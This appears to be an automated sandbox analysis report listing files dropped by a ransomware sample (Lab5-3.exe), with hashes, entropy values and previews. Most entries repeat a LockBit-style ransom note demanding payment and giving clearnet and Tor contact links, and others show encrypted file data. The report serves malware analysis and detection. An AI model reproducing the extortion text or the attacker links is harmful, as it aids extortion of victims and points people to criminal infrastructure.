                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9744
                                                                                                          Entropy (8bit):7.986601497913831
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:ErAwhP6tg/GQ6+HBGrVXGWGfWMJm3N/WDmYUEfKB0Cb:E83GHBGrlhim3N/WCYAtb
                                                                                                          MD5:2B9D2BAE43A5780A1DB9E5601B013CF1
                                                                                                          SHA1:962C0533171B685041FD1273C1545FC07AC7ADEA
                                                                                                          SHA-256:05A828CD9FB515BA277290E55E6B36B0DD19917F43A222F3DD16985644BC4F54
                                                                                                          SHA-512:C1767A49F4EBF3531891E5CE72066F8FCA98E15DEF77DACDD03538428228BA14027AF8B1A09129AF1EE77BBC362E241A620B9B068D5CD9790A3E38C947E5947A
                                                                                                          Malicious:false
                                                                                                          Preview:.n...r,...H)C.k.w.!..z...{..H.....UX....l\..[N......KO...9nB..%....H.......,%pzG7...C..=.].+.f.......<.f=....<.'k0..K......nX..O...\...4o.X+..s...w...ZYc.}.N...k.....J.3..N.Y.A..<...mh_.......R...v._..?@.B."....~q.X.O.B..,.R.T^b...da.=...I......V.........j/d..[.x$...X.......O..~..b.....hggRd....K...^.X...5.V|.@Ty......&@.<L.c`6.9.L....|..v4.....D....(I......HjF_...mr.pR.].,....Q..\."h"0|y/.D%C.i.....V...^.W.[@.`H.k{.<....|..{.....}.DS.~k.2.......v.L..{..r...0....#Fwn..QM......\^.........."..H..4......;...M.,.....r... 6."z....j.fU....Q`...2.d....9]^i\}.Y.jy..9....0.....0.U...n.....t........J.z....3....D."f.&.0uA.e.@....s...q.y..?....[.Q.J...`.#...~.....2!.uue..f...$V..+..}#.........D.. .|>.k.g._..d&.g...Q......W.{S...*y8.U../..]~...>A..........+.M.{I......4n..r.:..... [o.B.I...<..~O.....T<.+...>..(....I.{.........y(Z...C.eqw/Z\K....=....x..;.9=...M.....J..YHJ..Xs.x...M.d...Zx)..|9.u._$..`..8.Y....H..<.0y..#...v.....'.".
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20976
                                                                                                          Entropy (8bit):7.991534613866183
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:m5+VoMHbYq5fNKlBk2X9LJl/91uf6ck07oK2+2Qn7VO7WfDVYXtb:m5SwwfNYVX/rWDMkI7JZ
                                                                                                          MD5:B187C7B9C775E1ECBC85CA32A6736FBD
                                                                                                          SHA1:6332F0BDAAA4D273ECAF63411C6D59E2CE96709F
                                                                                                          SHA-256:2C7EBFF0D84992DB62144A1817F499CADA2AE83B05E76DEE6C5161B9CCAC0A8F
                                                                                                          SHA-512:0F10A6236A5BA0088C213BE17A5E9E98C99BF2CF7FB4388B74CC318A42CD7C4DB808F0B9FA89030E547887E3107A25C9DE9500B1AE9F28D6CFC8D05A960062B7
                                                                                                          Malicious:true
                                                                                                          Preview:....j8.x.^..p.....+M..Q+E.l.W..N...IwN.\`IX.6..jm.w...n...Z..{..o#R,.Ti.;y.*|-.UZ...)X.....QZ..=..OT..*F._Y.o...&....g\."..56.J..7y.a.o..9.;.... ..:?...K.3.t.%....8.Y...=.U...URJ.l8..5.. ..r[..D..d.w.././......\.bU.. Jw.cz.........,..Q."f....xw.q..59ne.+...T....:.B.....S@......M.......|.....q....,~o..pC........(y...s.1....nB..R`X0..........=n.....~....K.>...SN..T..%U.w..O.fY.[.K;h.frYf..PD$....a...kW.'.y[...{....40.|`.WPK.1{.2...q.g/....b.g..b..R...0.r..I..........^...Lz==T'....Y...*..<D.X....C.>Cu.#:.PY..A&d.(.>&u.g....7.F.PJ.HK."bvlb.Qmyt.....G.H@.V*.i...0..n...t,....%6)oFK]..3.N._.h.).;.',...`..e.`.s.F....|R.....>..G......3..h......M4.<..+..A$.{.@..Mq..D..MP.....G.Em.....8.9.%w......."..[DY.=.K3....6..)}.f.3..K....y.tF`..+(.wB8...sP(f&...xI#.s.ir.L3..........Q..7.l.&.,.A..........|.%..!\;..w.+.}6..3..,...Y..,.?..Q?..."..._:.%.. .s.....K.^s.x.X..@..C...(O.=]y..X.ym....H.{...;Ss...U.i....o......s.Q......Fr=....A..E..,~"<.j.s.1t.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16896
                                                                                                          Entropy (8bit):7.989703284100177
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:UN8DmDGYJidIM/RQJSieAWqUxj7qB4qs5ESnktb:UN8VVUlfqVqBLOkZ
                                                                                                          MD5:07684CC0B4069CA632CACB70EC98E578
                                                                                                          SHA1:B5BCC98C73BBF2AEC5F704FA50950921697C2DA5
                                                                                                          SHA-256:A518AEC7237DD4836418B38C3D07273FC22F31891B55E92636238F9565488BCB
                                                                                                          SHA-512:9A940A54483CE72CDA4F913B9C6CBA03E6E54DCCCDDA85B9C1EA66285A612EF55F9F0412AAA80467C3D67D13011C7C166E681F798AA2636E67AFFD0871484B2E
                                                                                                          Malicious:false
                                                                                                          Preview:l...Z.I...*.E3........M3.........0..0(..f..z.......rz".g.L...C..px.._...........!......./.nr2P.].._^zZt...fa....y^.....QT..n...q.8.....2=..V..*.......|.....^.+..:.....G-. J..fr..M.$H.t..O....../q.R.2.\..Sm...(....Qk.M.%IF......2.<.Yg.J.eaL...e...Hl....B.()...@.%(..f..e..w...N.q.6&....9.R..s...C...hP..#G...P..q.'..z...8.qZ......W^..5....!..A..g+.g.^.q=.Q+..-p.x..,...P.c.R..*]9r.c-*.^...2.P.62.C.ax.........._....@...*..^..mU..K.+=x.$;..~h.J]./....N...6 .X +?[<?....<...<.L.......J...I...:......<k.#9o.B...Z..v.;EG...A....D|H.......F`mk.r\...A....>..*h..u#...v....S.....J.|..c...../.@....u4..I.mUW[:..Q../.k1.g.h.............5$o..e.<.b.X.s!0.0...(.Jc7.9...../!..D.....Mw_b.NS.....y.>.....;.#sf..|./K...._5S....2.:.wO.:.<.J.7.n.r..>.U.r.x2#.o.O....]..H..GU..g..G!...H.Z....6GS..R..g.=.....8....&C.....7....^.....R!...da....s.]._E}....Rdl|...mA.^....U._!..l...Q.!..-..qEyxV`8".{..{...........?...".J...l.1N.=...}o.....a...=....M.m.,.$c\iK#:s....F..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):19504
                                                                                                          Entropy (8bit):7.990480035006863
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:5wo2iYXV01aiHXsh9q5kWeY1oGwYs3qPai2ztb:mo2XgQ9q+K1tns30axzZ
                                                                                                          MD5:36663F57DB61CDB4C2BE4FCD57310C17
                                                                                                          SHA1:7AF585D639E9A3BCE0670037B21E2DD48B6A58F6
